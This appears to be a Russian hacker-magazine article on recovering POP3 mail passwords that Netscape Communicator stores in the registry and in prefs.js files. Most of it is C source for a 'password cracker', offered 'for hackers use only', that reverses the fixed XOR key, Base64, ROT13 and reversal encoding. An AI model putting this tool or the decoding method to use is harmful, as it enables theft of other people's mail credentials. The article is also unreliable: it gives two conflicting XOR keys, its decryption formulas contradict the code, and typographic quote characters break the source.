После прочтения
,возможно, ты больше захочешь юзать продукцию
доблестной фирмы Netscape, но не забывай,что мы уже
писали о взломах зае…тьфу…The Bat!`a и M$ Outглюка, так
что пора поставить какой-нибудь отстойный, но
неглючный мэйлер…

В данной статье рассматриваются
алгоритмы шифрования/дешифрования паролей для
почтового сервера (pop3:110) в весьма популярном
браузере Netscape Communicator. Cуществует возможность
получения настроек пользователя через браузер.
Среди них и пароль пользователя для почтового
сервера. Эти настройки хранятся в файлах *.js (в
MustDie9x — prefs.js, liprefs.js, а в Linux — preferences.js). Кроме того, в
Windows-версии настройки юзверя также хранятся в
реестре:

[HKEY_CURRENT_USER\Software\Netscape\Netscape
Navigator\biff\users\<юзвер>\servers\<сервер>]
"password"="зашифрованный_пароль1"

В файлах настроек *.js пароль лежит в
таком виде:

user_pref("mail.pop_password","зашифрованный_пароль2");

Алгоритмы шифрования в первом и
втором случае (в реестре и в файле *.js) слегка
отличаются. Для реестра этот алгоритм можно
изобразить, например, так:

1) pass —> XOR(key) —> Base64_encode —> ROT13 —>
Reverse —> encrypted_pass

или так:

encrypted_pass = Reverse(ROT13(Base64_encode(XOR(pass,key))));

Для второго случая этот алгоритм
значительно проще:

2) pass —> XOR(key) —> Base64_encode —> encrypted_pass

или

encrypted_pass = Base64_encode(XOR(pass,key));

где XOR — последовательный xor по ключу
key; XOR — это алгоритм с массивом элементов: 035h, 09Ah,
0A6h, 053h, 0A9h, 0D4h, 06Ah. Каждому символу пароля
соответствует один элемент массива для шифровки,
то есть максимальная длина пасворда — 8 символов.
ROT13 — кодирование на основании циклического
сдвига латинского алфавита на 13 символов;
Reverse — реверсирование строки; Base64_encode —
кодирование MIME (см. RFC2045). Что касается ключа, по
которому XOR-ится пароль, он фиксирован и
представляет собой такую последовательность
байт (в 16-ричной(HEX) системе счисления): 

56, C9, EF, 4A, 9B, BE, 5A, 42, …

На самом деле это только первые 8
байт ключа, продолжение его можно легко найти,
имея зашифрованный пароль длиной более 8
символов. Правда, такие пароли встречаются
довольно редко.

Для дешифрования используются те же
алгоритмы, что и для шифрования,только в обратном
порядке, за исключением Base64_encode, вместо которого
используется алгоритм декодирования Base64:

1) pass = Reverse(ROT13(Base64_decode(XOR(encrypted_pass,key))));

2) pass = Base64_decode(XOR(encrypted_pass,key));

Ниже приводится исходник программы
на C, позволяющая расшифровать пароль в обоих
случаях (из реестра и из файлов настроек *.js).

/*
* Netscape Communicator vX.X Password Cracker
* Let`s go Hack this SUX!!
*
* For hackers use only.
*/

#include <stdio.h>
#include <stdlib.h>

char p[12], dp[9],
key[] = { 0x56, 0xc9, 0xef, 0x4a, 0x9b, 0xbe, 0x5a, 0x42 };

char *
rot13 (char *str)
{
int i;
char c, s;
for(i=0;i<strlen(str);i++)
{
c=str[i];
if (c>=’a’ && c<=’z’) s=’a’;
else if (c>=’A’ && c<=’Z’) s=’A’;
else s=0;
if(s>0) c=(c-s+13)%26;
str[i]=c+s;
}
return str;
}

char *
strrev(char *ptr)
{
int i,l;
char t;
l = strlen(ptr)-1;
for(i=0;i<=l>>1;i++)
{
t = ptr[i];
ptr[i] = ptr[l-i];
ptr[l-i] = t;
}
return ptr;
}

int
cvt_ascii( unsigned char a )
{
if ( (a >= ‘A’) && (a <= ‘Z’) ) return (int)(a — ‘A’);
else if ( (a >= ‘a’) && (a <= ‘z’) )
return 26 + (int)(a — ‘a’);
else if ( (a >= ‘0’) && (a <= ‘9’ ) )
return 52 + (int)(a — ‘0’);
else if ( a == ‘+’ ) return 62;
else if ( a == ‘/’ ) return 63;
else if ( a == ‘=’ ) return -2;
else return -1;
}

int
base64_decode (char *buf, char *dest)
{
int i, sh=0, ds=0, offs=0;
unsigned char bv;
unsigned long ac=0, vl;

for (i = 0; (buf[i] != ‘\n’) && (buf[i] != ‘\0’) && (ds >= 0); i++ )
{
if (((buf[i] >= ‘A’) && (buf[i] <= ‘Z’) ) ||
((buf[i] >= ‘a’) && (buf[i] <= ‘z’) ) ||
((buf[i] >= ‘0’) && (buf[i] <= ‘9’) ) ||
(buf[i] == ‘+’) ||
(buf[i] == ‘/’) ||
(buf[i] == ‘=’) )
ds = 1;
else
ds = -2;
}
if ( ds <= 0 ) ds = 0;
for (i = 0; (buf[i] != ‘\n’) && (buf[i] != ‘\0’); i++)
{
vl = cvt_ascii( buf[i] );
if ( vl < 64 ) {
ac <<= 6;
sh += 6;
ac |= vl;
if ( sh >= 8 ) {
sh -= 8;
vl = ac >> sh;
bv = (unsigned char)vl & 0xFFl;
*(dest+offs) = bv;
offs++;
}
}
else break;
}
return offs;
}

void main()
{
int i, cn;
printf("Netscape Communicator Password Cracker \n");
printf("Encrypted password: ");
scanf("%12s", p);
if(*p==’=’)
rot13(strrev(p));
cn = base64_decode(p, dp);
for(i=0;i<cn;i++)
dp[i] ^= key[i%8];
printf("Password: ‘%s’\n", dp);
}

Стоит отметить, что автор проги Elli0t.
Все вышеизложенное проверялось на версиях 4.5 и
4.08, но должно работать и на других версиях

Оставить мнение

Check Also

Equifax взломали не в мае, а в марте, и компания направляла пользователей на фейковый сайт

Появляются все новые подробности о взломе бюро кредитных историй Equifax и, к сожалению, и…